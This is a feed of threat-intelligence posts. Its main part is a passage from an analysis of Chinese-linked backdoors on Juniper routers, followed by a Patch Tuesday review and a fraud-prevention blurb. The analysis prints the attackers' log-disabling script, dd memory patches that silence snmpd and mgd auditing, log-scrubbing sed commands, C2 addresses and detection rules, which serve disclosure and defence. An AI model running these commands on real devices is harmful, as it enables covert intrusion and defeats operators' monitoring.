hands-on threat actor activity on the router. It begins by writing a compressed zip archive to the file /var/tmp/pfed_jdhcp6_trace.log. It then executes the following command line to decompress the archive, execute an embedded script with argument pre and clean up the script after execution: gzip -d /var/tmp/pfed_jdhcp6_trace.log -c > /var/tmp/pfed_jdhcp6_trace.log.bak; sh /var/tmp/pfed_jdhcp6_trace.log.bak pre ; rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ; kill -9 $$ The following is the uncompressed script file: pre_ssh() { #closelog cp /mfs/var/etc/syslog.conf /mfs/var/etc/syslog.conf0 sed -i '' 's/\/dev\/null #//g' /mfs/var/etc/syslog.conf0 sed -i '' 's/ / \/dev\/null #/g' /mfs/var/etc/syslog.conf ps -fcA |grep eventd | awk '{ print $1 }' | xargs kill -1 #last cp -r /var/log/utx.log /var/log/utx.log0 cp -r /var/log/wtmp /var/log/wtmp0 } post_ssh() { #relog cp /mfs/var/etc/syslog.conf0 /mfs/var/etc/syslog.conf rm -f /mfs/var/etc/syslog.conf0 ps -fcA | grep eventd | awk '{ print $1 }' | xargs kill -1 #relast cp -r /var/log/wtmp0 /var/log/wtmp cp -r /var/log/utx.log /var/log/utx.log0 rm -f /var/log/wtmp0 } backup() { #backconf rm -rf /var/rundb+ cp -r /var/rundb /var/rundb+ cp /var/db/commits /usr/lib/libjucomm.so.1 tar -cf /config/usage_db /config/juniper.conf.* tar -cf /var/db/config/usage_db /var/db/config/juniper.conf.* } restore() { #reconfig cp -r /var/rundb+/* /var/rundb cp /usr/lib/libjucomm.so.1 /var/db/commits tar -xf /config/usage_db -C / tar -xf /var/db/config/usage_db -C / rm -r /var/rundb+ rm -f /usr/lib/libjucomm.so.1 rm -f /config/usage_db rm -f /var/db/config/usage_db } if [ $1 = "pre" ]; then pre_ssh elif [ $1 = "post" ]; then post_ssh elif [ $1 = "backup" ]; then backup elif [ $1 = "restore" ]; then restore fi echo done exit 0 This script can execute 4 commands: pre: backups syslog.conf as syslog.conf0, it also redirects all logging to /dev/null, sends HUP signal to eventd daemon responsible for logging and backs up last log and wtmp log.  post: reverses changes done by pre_ssh, it restores original syslog.conf as well as last log and wtmp log, it removes backups and sends another HUP signal to eventd process.  backup: it backups the current Juniper configuration database and commit logs and archives configuration files.  restore: it restores previously backed up configuration database and config files and removes backups.  After stopping logging with pre_ssh script, this command then reads the snmpd process PID from /var/run/snmpd.pid. It also reads 4 bytes of data from address 0x8601328 and writes it to the file /var/tmp/rts by using dd: dd if=/proc//mem of=/var/tmp/rts bs=1 count=4 iseek=0x8601328 2>/dev/null It then changes this data to 0 and writes it to /var/tmp/rts and later back to snmpd process memory using the same dd technique: dd of=/proc//mem if=/var/tmp/rts bs=1 count=4 oseek=0x8601328 conv=notrunc 2>/dev/null This patches the snmpd process memory at address  0x8601328. The patch sets a global variable named trap_configs to 0. trap_configs possibly points to a structure containing SNMP traps that are sent to the monitoring server. Effectively this stops SNMP traps from being triggered which is most likely done to stop SNMP traps from triggering when specific events stop being logged in syslog.  The malware then repeats similar actions against the mgd (Juniper Management Daemon) process. It reads mgd process PID from /var/run/mgd.pid and using the same technique previously mentioned it reads 4 bytes from  mgd process memory at 0x84E90D8 . It compares these bytes to 57E58955 (which after swapping endianness, disassembles to: PUSH RBP; MOV EBP,ESP; PUSH RDI instructions which is a typical function prologue), and if they match, it patches them with following bytes: C3D08990. If we disassemble these bytes from a little endian order, we get NOP; MOV EAX,EDX; RET instructions. This patch modifies the prologue of the function at 0x84E90D8 to NOP, MOV EAX,EDX, RET  effectively skipping the rest of the function. Based on the behavioral analysis, the goal of this patch is likely to stop auditd logging of MGD login, logout, cmd events. This direct memory manipulation using dd allows the attacker to alter program behavior and bypass security measures. UNC3886 previously used a similar tactic, where dd was used to disable file system verification on startup. In that case, UNC3886 exploited a vulnerability (CVE-2022-41328) to overwrite legitimate FortiOS system binaries, achieving persistence and evading security checks.  Command 1 This command can reverse operations performed by Command 0 after the operator finished their hands-on-keyboard operations. It restores logging by executing sh /var/tmp/pfed_jdhcp6_trace.log.bak post, it also reverses patches to snmpd and mgd. Command 2 — Launch CSH Session This command launches an interactive /bin/csh session over the UDP connection, with a forked process encrypting the input and output of the shell and transmitting it over the network. Before executing remote shell, this commands launches a series of sed commands to remove specific lines from log files: sed -i '' '/root/d' /var/log/interactive-commands sed -i '' -e '/vi/d' -e '/set/d' -e '/gdb/d' -e '/mgd/d' /root/.history sed -i '' '/root/d' /var/log/messages sed -i '' '/root/d' /var/log/auth These remove lines containing the term root from /var/log/interactive-commands, /var/log/messages, and /var/log/auth. They also remove instances of vi, set, gdb, and mgd from /root/.history. Command 3 — Request New Sleep Timeout This command will cause the malware to send a reply to the connection containing the value of the current sleep timeout. The response to that message will contain the new 4-byte sleep timeout that will be used by the main command loop (in seconds). Command 4 — File Upload This command will cause the malware to send a specified file to the remote server. Command 5 — File Download This command will cause the malware to download a file from the remote server and write it to the disk. Command 6 — Backup Configuration Database This command causes the malware to execute the same script as Command 0 but with argument backup to backup Juniper configuration database and commit logs. gzip -d /var/tmp/pfed_jdhcp6_trace.log -c > /var/tmp/pfed_jdhcp6_trace.log.bak; sh /var/tmp/pfed_jdhcp6_trace.log.bak backup ; rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ; kill -9 $$ Command 7 — Restore configuration database This command causes the malware to execute the same script as Command 0 but with argument restore to restore Juniper configuration database and commit logs: gzip -d /var/tmp/pfed_jdhcp6_trace.log -c > /var/tmp/pfed_jdhcp6_trace.log.bak; sh /var/tmp/pfed_jdhcp6_trace.log.bak restore ; rm -rf /var/tmp/pfed_jdhcp6_trace.log /var/tmp/pfed_jdhcp6_trace.log.bak ; kill -9 $$ Command 8 - Receive new socket timeout value This command will cause the malware to send a reply to the connection containing the value of the current socket timeout. The response to that message will contain the new 4-byte value that will be used to update the main socket timeout. The default socket timeout value is 300 seconds If any other command is passed, malware will close the socket and exit.  jdosd — TINYSHELL-Based Passive Backdoor Sample five, named jdosd, is a passive backdoor written in C. It implements a UDP backdoor operating on a fixed port number which provides file transfer and remote shell capabilities. Malware binds to UDP port 33512 and uses a custom RC4 implementation. This implementation has a bug in it where it doesn't properly retrieve a final state box value during its PRGA generation. The following key is used for the traffic encryption: 4fd37426-65dd-4a8d-8ba6-1382a011dae9 The attacker initiates the connection to the backdoor by sending a magic value 0xDEADBEEF. The malware responds to this message by sending the same message in response, encrypted with custom RC4. The malware will then send the process ID (pid) of its own process to the C2. After the initial beacon the malware waits for additional commands. In addition to standard TINYSHELL commands (1-3), there are two additional commands supported(0xAC, 0xFF): Command Code Description Comment 1 Upload data. Reads a file path from the received data stream and sends the contents of the file to the remote host. Standard TINYSHELL command 2 Reads a file name from the data stream, creates it, then reads the file contents to write to that file from the data stream. Standard TINYSHELL command 3 Launches an interactive /bin/csh session, with all input and output marshaled across the UDP connection Standard TINYSHELL command 0xAC Does nothing Custom command 0xFF Exits the Program Custom command oemd — TINYSHELL-Based Passive Backdoor Sample six, named oemd, is a passive backdoor written in C. The backdoor receives the C2 address and port by binding on specific network interfaces. Network interfaces are stored in an environment variable. The backdoor communicates with the C2 over TCP. Communication with C2 is AES-encrypted and XOR-encoded. The malware configuration is stored in the following environment variables: INTFS: The network interfaces' names to bind to. RTS: The routing addresses to bind to (instead of interfaces). UPRT: The port to bind to (if not specified, 45678 is used) DAEMON: Run the sample in the background. During initialization, malware executes following command to retrieve local-index number of an interface specified in the INTFS environment variable: ifinfo '' | grep local-index | grep -Eo '[0-9]+' After setting up a local UDP socket, malware binds to 0.0.0.0: on the specified interfaces and waits for the attacker to send the C2 address and port. After receiving a C2 address on the UDP socket it establishes a new TCP connection to the provided target. Malware supports a set of standard TINYSHELL commands: 1: Upload a file. 2: Download a file. 3: Execute a shell command. When executing shell commands, the malware clears the HISTFILE environment variable and allows the attacker to specify the TERM value. Junos OS Specific Socket Options All the previously listed samples create an AF_ROUTE socket using socket(AF_ROUTE(17), SOCK_SEQPACKET(5), 0). Running these samples on a standard FreeBSD system would return an invalid socket, hence we believe this to be a JunosOS specific implementation. We believe that this socket is used to establish a connection for communicating with the operating system's routing subsystem. The AF_ROUTE constant designates the socket family for routing operations, and SOCK_SEQPACKET specifies a reliable, message-oriented connection. This socket is used to read and write a packet similar in structure to rt_* messages on OpenBSD to retrieve the interface index. From all the samples, only oemd uses the ifinfo command to retrieve the interface index, while other samples are using a custom rt_* messages via the socket. The custom message contains an interface name and a logical sub interface. On Juniper routing devices, instead of tagging packets with VLAN IDs, sub-interfaces act as distinct interfaces with their own IP addresses, routing configurations, and potentially different security policies. The interface index value is then passed into a setsockopt call for a command and control socket either TCP or UDP. Activity in Linux Environments Mandiant continued to observe UNC3886 leverage similar TTPs and use of the same malware and utilities as detailed in our previous blog post as follows: Command execution and persistence using a combination of rootkits and utilities, including REPTILE and MEDUSA with SEAELF loader, and BUSYBOX. Instead of using the publicly available kubo/injector as noted previously, Mandiant observed UNC3886 deployed PITHOOK along with a custom SSH server based on the publicly available wzshiming/sshd project to hijack SSH authentications and capture SSH credentials. TACACS+ daemon binary was replaced by a backdoored version of the binary with similar malicious functions for capturing credentials. Use of GHOSTTOWN malware for anti-forensics purposes. Mandiant’s investigation did not observe evidence of data staging and exfiltration. Outlook and Implications This blog post further highlights China-nexus espionage actors  are continuing to compromise networking infrastructure with custom malware ecosystems. While UNC3886 previously focused their operations on network edge devices, this activity demonstrated they’re also targeting internal networking infrastructure, such as Internet Service Provider (ISP) routers. Mandiant observed the threat actor targeting network authentication services, including the Terminal Access Controller Access-Control System (TACACS+), and terminal servers with access to the routers to gain privileged initial access. This privileged access allowed the threat actor to enter Junos OS shell mode and perform restricted operations. Investigating further actions taken by the threat actor was hampered by the challenges inherent in analyzing proprietary network devices, which required novel methods for artifact acquisition and analysis.  Mandiant recommends organizations: Upgrade Juniper devices and run security checks: Organizations should upgrade their Juniper devices to the latest images which contain mitigations and updated signatures for JMRT and run JMRT Quick Scan and Integrity check after the upgrade.  Secure Authentication: Implement a centralized Identity and Access Management (IAM) system with robust multi-factor authentication (MFA) and granular role-based access control (RBAC) for managing network devices. Configuration Management: Implement a network configuration management that supports configuration validation against defined templates and standards, with the ability to automatically remediate deviations or trigger alerts for manual intervention. Enhanced Monitoring: Address and prioritize high-risk administrative activities and implement monitoring solutions with a process to regularly review the effectiveness of detection. Vulnerability Management: Prioritize patching and mitigation of vulnerabilities in network devices, including those in lesser-known operating systems. Device Lifecycle Management: Implement a device lifecycle management program that includes proactive monitoring, automated software updates, and end-of-life (EOL) replacement planning to ensure network devices are always supported and secure.  Security Hardening: Strengthen the security posture of network devices, administrative devices and systems used for managing network devices by implementing strict access controls, network segmentation, and other security measures. Threat Intelligence: Proactively leverage threat intelligence to continually evaluate and improve the effectiveness of security controls against emerging threats. The compromise of routing devices is a recent trend in the tactics of espionage-motivated adversaries as it grants the capability for a long-term, high-level access to the crucial routing infrastructure, with a potential for more disruptive actions in the future. A concerted effort is required to safeguard these critical systems and ensure the continued stability and security of the internet. Organizations potentially impacted by this campaign are strongly advised to engage Mandiant's Custom Threat Hunt service. Mandiant's team of security experts can proactively identify and mitigate hidden threats, providing clarity and confidence in your security posture. Acknowledgement This analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE. A special thanks goes to Paul Tarter, Adam Markun, and Ange Albertini who contributed to analysis of the malware detailed in this blog post. Indicators of Compromise A Google Threat Intelligence Collection of IOCs is available for registered users. For Google Security Operations Enterprise+ customers, rules have been released to your Emerging Threats rule pack, and indicators of compromise (IOCs) listed in this blog post are available for prioritization with Applied Threat Intelligence. Host-Based Indicators Filename Malware Family MD5 SHA1 SHA256 appid TINYSHELL 2c89a18944d3a895bd6432415546635e 50520639cf77df0c15cc95076fac901e3d04b708 98380ec6bf4e03d3ff490cdc6c48c37714450930e4adf82e6e14d244d8373888 irad TINYSHELL aac5d83d296df81c9259c9a533a8423a 1a6d07da7e77a5706dd8af899ebe4daa74bbbe91 5bef7608d66112315eefff354dae42f49178b7498f994a728ae6203a8a59f5a2 jdosd TINYSHELL 8023d01ffb7a38b582f0d598afb974ee 06a1f879da398c00522649171526dc968f769093 c0ec15e08b4fb3730c5695fb7b4a6b85f7fe341282ad469e4e141c40ead310c3 lmpad TINYSHELL 5724d76f832ce8061f74b0e9f1dcad90 f8697b400059d4d5082eee2d269735aa8ea2df9a 5995aaff5a047565c0d7fe3c80fa354c40e7e8c3e7d4df292316c8472d4ac67a oemd TINYSHELL e7622d983d22e749b3658600df00296d cf7af504ef0796d91207e41815187a793d430d85 905b18d5df58dd6c16930e318d9574a2ad793ec993ad2f68bca813574e3d854b to TINYSHELL b9e4784fa0e6283ce6e2094426a02fce 01735bb47a933ae9ec470e6be737d8f646a8ec66 e1de05a2832437ab70d36c4c05b43c4a57f856289224bbd41182deea978400ed oemd TINYSHELL bf80c96089d37b8571b5de7cab14dd9f cec327e51b79cf11b3eeffebf1be8ac0d66e9529 3751997cfcb038e6b658e9180bc7cce28a3c25dbb892b661bcd1065723f11f7e lmpad TINYSHELL 3243e04afe18cc5e1230d49011e19899 2e9215a203e908483d04dfc0328651d79d35b54f 7ae38a27494dd6c1bc9ab3c02c3709282e0ebcf1e5fcf59a57dc3ae56cfd13b4 Network Indicators Description Indicator TINYSHELL Command and Control server 129.126.109.50:22 TINYSHELL Command and Control server 116.88.34.184:22 TINYSHELL Command and Control server 223.25.78.136:22 TINYSHELL Command and Control server 45.77.39.28:22 TINYSHELL Command and Control server 101.100.182.122:22 TINYSHELL Command and Control server 118.189.188.122:22 TINYSHELL Command and Control server 158.140.135.244:22 TINYSHELL Command and Control server 8.222.225.8:22 Detection YARA-L Rules Relevant rules are available in the Google SecOps Mandiant Intel Emerging Threats curated detections rule set. SEAELF Installer Execution GHOSTTOWN Utility Execution REPTILE Rootkit Command Line Argument Tampering REPTILE Rootkit Cmd Component Usage REPTILE Rootkit Shell Component Usage REPTILE Rootkit Hide Command Usage YARA Rules rule M_Hunting_PacketEncryptionLayer_1 { meta: author = "Mandiant" strings: $pel_1 = "pel_client_init" $pel_2 = "pel_server_init" $pel_3 = "pel_setup_context" $pel_4 = "pel_send_msg" $pel_5 = "pel_recv_msg" $pel_6 = "pel_send_all" $pel_7 = "pel_recv_all" $pel_8 = "pel_errno" $pel_9 = "pel_context" $pel_10 = "pel_ctx" $pel_11 = "send_ctx" $pel_12 = "recv_ctx" condition: 4 of ($pel_*) } rule M_Hunting_TINYSHELL_5 { meta: author = "Mandiant" strings: $tsh_1 = "tsh_get_file" $tsh_2 = "tsh_put_file" $tsh_3 = "tsh_runshell" $tshd_1 = "tshd_get_file" $tshd_2 = "tshd_put_file" $tshd_3 = "tshd_runshell" condition: all of ($tshd_*) or all of ($tsh_*) } Snort/Suricata Rules alert udp any any -> any any ( msg:"M_Backdoor_TINYSHELL_deadbeef_1"; dsize:>15; content:"|44 31 3A 14 45 95 6A 73|"; offset: 0; depth:8; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000000; rev:1; ) alert udp any any -> any any ( msg:"M_Backdoor_TINYSHELL_deadbeef_2"; dsize:>15; content:"|64 11 1A 34 65 B5 4A 53|"; offset: 0; depth:8; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000001; rev:1; ) alert icmp any any -> any any ( msg:"M_Backdoor_TINYSHELL_uSarguuS62bKRA0J"; content:"|f3 d5 e7 f4 e1 f3 f3 d5 b0 b4 e4 cd d4 c7 b6 cc|"; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000002; rev:1; ) alert udp any any -> any any ( msg:"M_Backdoor_TINYSHELL_0b3330c0b41d1ae2"; dsize:>27; content:"|c5 c4 ec 4d|"; offset: 0; depth:4; content:"|a6 04 ed 83 92 46 ce 40 9a 34 8c 7b 5a d6 e5 0d|"; offset:12; depth:16; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000003; rev:1; )

https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers/
The March 2025 Security Update Review
2025-03-11T17:39:36Z | 1741714776

We’ve reached the third Patch Tuesday of 2025, and, as expected, Microsoft and Adobe have released their latest security offerings. Take a break from your scheduled activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here: Adobe Patches for March 2025For March, Adobe released seven bulletins addressing 37 CVEs in Adobe Acrobat Reader, Substance 3D Sampler, Illustrator, Substance 3D Painter, InDesign, Substance 3D Modeler, and Substance 3D Designer. Six of these bugs were reported through the ZDI program. The patch for Reader contains fixes for multiple Critical-rated code execution bugs. This should be the top priority for deployment. The fix for Illustrator also corrects some Critical-rated code execution bugs. That also holds true for the InDesign patch. For all of the products, an attacker would need to convince a user to open a specially crafted file.The remaining patches all touch the Substance family of products. The fix for Substance 3D Sampler addressed seven bugs with some of those being Critical. The patch for Substance 3D Painter corrects two code execution bugs. The update for Substance 3D Modeler also has two CVEs, but only one is for a code execution bug. Finally, the patch for Substance 3D Designer addresses two Critical-rated code execution vulnerabilities.None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3. Microsoft Patches for March 2025This month, Microsoft released 56 new CVEs in Windows and Windows Components, Office and Office Components, Azure, .NET and Visual Studio, Remote Desktop Services, DNS Server, and Hyper-V Server. One of the actively exploited bugs was submitted through the Trend ZDI program. With the addition of the third-party CVEs, the entire release tops out at 67 CVEs.Of the patches released today, six are rated Critical, and 50 are rated Important in severity. This is nearly identical to the release last month in volume, but the number of actively exploited bugs is extraordinary. One of these bugs is listed as publicly known, and six(!) others are listed as under active attack at the time of release. Let’s take a closer look at some of the more interesting updates for this month, starting with the bug discovered by a Trend researcher:-    CVE-2025-26633 - Microsoft Management Console Security Feature Bypass VulnerabilityThis bug was discovered by Aliakbar Zahravi and has been seen in the wild and used in targeted attacks. The specific flaw exists within the handling of MSC files. The product does not warn the user before loading an unexpected MSC file. An attacker can leverage this vulnerability to evade file reputation protections and execute code in the context of the current user. There is user interaction required here, but that doesn’t seem to be a problem for the attacker – EncryptHub (aka Larva-208). With more than 600 organizations impacted by these threat actors, test and deploy this fix quickly to ensure your org isn’t added to the list. Ali will have further details about these attacks out soon.-    CVE-2025-24993 - Windows NTFS Remote Code Execution Vulnerability CVE-2025-24985 - Windows Fast FAT File System Driver Remote Code Execution VulnerabilityThese are two more bugs being exploited, and I group them together because they are triggered by the same action. To be exploited, a user would need to mount a specially crafted virtual hard drive (VHD). It’s interesting to see the root cause of these bugs is an overflow; heap-based for the NTFS and an integer overflow for Fast FAT. Once exploited, the attacker can execute code on an affected system. If paired with a privilege escalation (like the one below), they could completely take over a system.-    CVE-2025-24983 - Windows Win32 Kernel Subsystem Elevation of Privilege VulnerabilityThis is another bug being actively exploited, but it’s a more traditional privilege escalation than the other one. In this case, an authenticated user would need to run a specially crafted program that ends up executing code with SYSTEM privileges. That’s why these types of bugs are usually paired with a code execution bug to take over a system. Microsoft doesn’t provide any information on how widespread these attacks are, but regardless of how targeted the attacks may be, I would test and deploy these patches quickly.-    CVE-2025-24984/CVE-2025-24991 - Windows NTFS Information Disclosure VulnerabilityThese are the final two bugs under active attack in this release. They have different triggers, but both simply lead to info leaks consisting of unspecified memory contents. CVE-2025-24984 requires physical access, which is unusual to see in an active attack. The other CVE requires the target to mount a specially crafted VHD. Even though the info leak isn’t targeted, it must be worth getting since these are being exploited. Don’t sleep on these. Test and deploy the fixes quickly. Here’s the full list of CVEs released by Microsoft for March 2025: CVE Title Severity CVSS Public Exploited Type CVE-2025-26633 Microsoft Management Console Security Feature Bypass Vulnerability Important 7 No Yes SFB CVE-2025-24985 Windows Fast FAT File System Driver Remote Code Execution Vulnerability Important 7.8 No Yes RCE CVE-2025-24984 Windows NTFS Information Disclosure Vulnerability Important 4.6 No Yes Info CVE-2025-24991 Windows NTFS Information Disclosure Vulnerability Important 5.5 No Yes Info CVE-2025-24993 Windows NTFS Remote Code Execution Vulnerability Important 7.8 No Yes RCE CVE-2025-24983 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7 No Yes EoP CVE-2025-26630 Microsoft Access Remote Code Execution Vulnerability Important 7.8 Yes No RCE CVE-2025-24057 Microsoft Office Remote Code Execution Vulnerability Critical 7.8 No No RCE CVE-2025-26645 Remote Desktop Client Remote Code Execution Vulnerability Critical 8.8 No No RCE CVE-2025-24064 Windows Domain Name Service Remote Code Execution Vulnerability Critical 8.1 No No RCE CVE-2025-24035 Windows Remote Desktop Services Remote Code Execution Vulnerability Critical 8.1 No No RCE CVE-2025-24045 Windows Remote Desktop Services Remote Code Execution Vulnerability Critical 8.1 No No RCE CVE-2025-24084 Windows Subsystem for Linux (WSL2) Kernel Remote Code Execution Vulnerability Critical 8.4 No No RCE CVE-2025-24070 ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-21199 Azure Agent Installer for Backup and Site Recovery Elevation of Privilege Vulnerability Important 6.7 No No EoP CVE-2025-26627 † Azure Arc Installer Elevation of Privilege Vulnerability Important 7 No No EoP CVE-2025-24049 Azure Command Line Integration (CLI) Elevation of Privilege Vulnerability Important 8.4 No No EoP CVE-2025-24986 Azure Promptflow Remote Code Execution Vulnerability Important 6.5 No No RCE CVE-2025-24997 DirectX Graphics Kernel File Denial of Service Vulnerability Important 4.4 No No DoS CVE-2025-24046 Kernel Streaming Service Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-24066 Kernel Streaming Service Driver Elevation of Privilege Vulnerability Important 8.4 No No EoP CVE-2025-24067 Kernel Streaming Service Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-24995 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21247 MapUrlToZone Security Feature Bypass Vulnerability Important 4.3 No No SFB CVE-2025-24075 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-24081 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-24082 Microsoft Excel Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-24072 Microsoft Local Security Authority (LSA) Server Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-24080 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-24083 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-26629 Microsoft Office Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-24076 Microsoft Windows Cross Device Service Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-24994 Microsoft Windows Cross Device Service Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-24071 Microsoft Windows File Explorer Spoofing Vulnerability Important 7.5 No No Spoofing CVE-2025-24077 Microsoft Word Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-24078 Microsoft Word Remote Code Execution Vulnerability Important 7 No No RCE CVE-2025-24079 Microsoft Word Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-24054 NTLM Hash Disclosure Spoofing Vulnerability Important 6.5 No No Spoofing CVE-2025-24996 NTLM Hash Disclosure Spoofing Vulnerability Important 6.5 No No Spoofing CVE-2024-9157 * Synaptics: CVE-2024-9157 Synaptics Service Binaries DLL Loading Vulnerability Important N/A No No RCE CVE-2025-26631 Visual Studio Code Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-25003 Visual Studio Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-24998 Visual Studio Installer Elevation of Privilege Vulnerability Important 7.3 No No EoP CVE-2025-24043 WinDbg Remote Code Execution Vulnerability Important 7.5 No No RCE CVE-2025-24059 Windows Common Log File System Driver Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-21180 Windows exFAT File System Remote Code Execution Vulnerability Important 7.8 No No RCE CVE-2025-24048 Windows Hyper-V Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-24050 Windows Hyper-V Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-24061 Windows Mark of the Web Security Feature Bypass Vulnerability Important 7.8 No No SFB CVE-2025-24992 Windows NTFS Information Disclosure Vulnerability Important 5.5 No No Info CVE-2025-24051 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-25008 Windows Server Elevation of Privilege Vulnerability Important 7.1 No No EoP CVE-2025-24056 Windows Telephony Service Remote Code Execution Vulnerability Important 8.8 No No RCE CVE-2025-24987 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-24988 Windows USB Video Class System Driver Elevation of Privilege Vulnerability Important 6.6 No No EoP CVE-2025-24055 Windows USB Video Class System Driver Information Disclosure Vulnerability Important 4.3 No No Info CVE-2025-24044 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability Important 7.8 No No EoP CVE-2025-1914 * Chromium: CVE-2025-1914 Out of bounds read in V8 High N/A No No N/A CVE-2025-1915 * Chromium: CVE-2025-1915 Improper Limitation of a Pathname to a Restricted Directory in DevTools Medium N/A No No N/A CVE-2025-1916 * Chromium: CVE-2025-1916 Use after free in Profiles Medium N/A No No N/A CVE-2025-1917 * Chromium: CVE-2025-1917 Inappropriate Implementation in Browser UI Medium N/A No No N/A CVE-2025-1918 * Chromium: CVE-2025-1918 Out of bounds read in PDFium Medium N/A No No N/A CVE-2025-1919 * Chromium: CVE-2025-1919 Out of bounds read in Media Medium N/A No No N/A CVE-2025-1921 * Chromium: CVE-2025-1921 Inappropriate Implementation in Media Stream Medium N/A No No N/A CVE-2025-1922 * Chromium: CVE-2025-1922 Inappropriate Implementation in Selection Low N/A No No N/A CVE-2025-1923 * Chromium: CVE-2025-1923 Inappropriate Implementation in Permission Prompts Low N/A No No N/A CVE-2025-26643 * Microsoft Edge (Chromium-based) Spoofing Vulnerability Low 5.4 No No Spoofing * Indicates this CVE had been released by a third party and is now being included in Microsoft releases.† Indicates further administrative actions are required to fully address the vulnerability.Moving on to the other Critical-rated bugs, there’s a frightening-looking bug in DNS server that could allow code execution if an attacker sends a specially crafted DNS response to an affected server. However, that is incredibly unlikely to be parsed by the server. Having done DNS spoofing in a past life, it’s tricky, so this is unlikely to be exploited. The Office bug where Preview Pane is an attack vector is more likely to see exploits, but Microsoft confusingly states user interaction is required. Perhaps the target needs to preview the file in the Preview Pane? The bugs in Remote Desktop Services are also concerning as they could allow code execution if an attacker connects to an affected RDS gateway. The Remote Desktop Client bug is less concerning as a target would need to connect to a malicious server. Also less concerning is the bug in the Windows Subsystem for Linux as it requires elevated privileges to exploit.Looking at the other code execution bugs, there are quite a few open and own bugs in Office components. This includes a bug in Access that’s listed as publicly known. There’s a fix for Azure PromptFlow that allows a remote, unauthenticated attacker to run code on an affected system. The bug in WinDbg could allow code execution due to the improper verification of cryptographic signature in .NET. However, Microsoft fails to provide any details of the exploit scenario. There’s a bug in exFAT that looks similar to two of the bugs being exploited in the wild. Since this one is not listed as exploited, it’s likely a variant of one (or both) of those. Finally, there are bugs in the RRAS and Telephony service, which seems like a monthly standard at this point. We have yet to see any of these types of bugs exploited, so there is not much concern there.There are a handful of privilege escalation bugs receiving fixes in this month’s release, and most of these either lead to SYSTEM-level code execution or administrative privileges if an authenticated user runs specially crafted code. Beyond those, the bugs in Hyper-V could lead to Kernel Memory Access. The bug in Windows Server could lead to a file deletion, which can then be turned into a privilege escalation. A similar bug was reported as being under active attack last month. One of the Visual Studio bugs leads to escalating to privileges of the affected application. That’s also true for the bug in Azure Command Line Integration (CLI). The bug in ASP.NET Core and Visual Studio allows an attacker to escalate to the privileges of the compromised user. The bug in Azure Arc Installer leads to SYSTEM privileges, but you’ll need to do more than just patch to address it. This only affects machines onboarded via Group Policy, but if they were, you’ll need to roll out new GPOs to fully resolve the vulnerability.In addition to the security feature bypass (SFB) bug being exploited in the wild, there are two other SFB fixes in this month’s release. The first is in MapUrlToZone. This bug allows attackers to bypass the security feature and have URLs processed in incorrect zones. The other is in Mark of the Web, which we have seen abused by threat actors in the past. Again, the vulnerability allows files to be treated as though they aren’t as dangerous as they seem and fails to warn users – who generally click on anything.Looking at the Spoofing bugs in the March release, two are listed as NTLM Hash Disclosures. In both cases, user interaction is required. However, that interaction can be as simple as a single clicking (selecting) on a malicious file. If successful, an attacker could then spoof that NTLM hash for further compromise. There are not many details available for the File Explorer spoofing bug other than to say that a remote, unauthenticated attacker could “perform spoofing over a network.”There are only two other information disclosure bugs this month, and one looks like a variant of the NTFS info disclosures under active attack. Again, it only yields unspecified memory contents. That’s also true for the bug in the Windows USB Video Driver, but Microsoft notes this is a physical attack. They don’t specify what type of physical attack, but considering it’s in a USB component, that likely means plugging in a USB device. The March release contains just one Denial-of-Service (DoS) bug in the DirectX Graphics Kernel File, but it requires admin credentials to exploit.No new advisories are being released this month.Looking AheadThe next Patch Tuesday of 2025 will be on April 11, and I’ll return with my analysis and thoughts about the release. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

https://www.thezdi.com/blog/2025/3/11/the-march-2025-security-update-review
It’s Fraud Prevention Month. Do You Have the Infrastructure Intelligence You Need?
2025-03-11T17:38:09Z | 1741714689

As we observe Fraud Prevention Month this March, it's imperative for financial institutions, and anyone who deals with people and the potential for deception, to reassess and strengthen their defenses against the ever-evolving landscape of fraud. Traditional methods, while foundational, often fall short in detecting sophisticated schemes. To stay ahead, organizations must delve deeper into the digital footprints of both their customers and potential customers, leveraging infrastructure intelligence to proactively identify and mitigate in advance downstream fraudulent activities.​

https://www.hyas.com/blog/its-fraud-prevention-month-do-you-have-the-infrastructure-intelligence-you-need
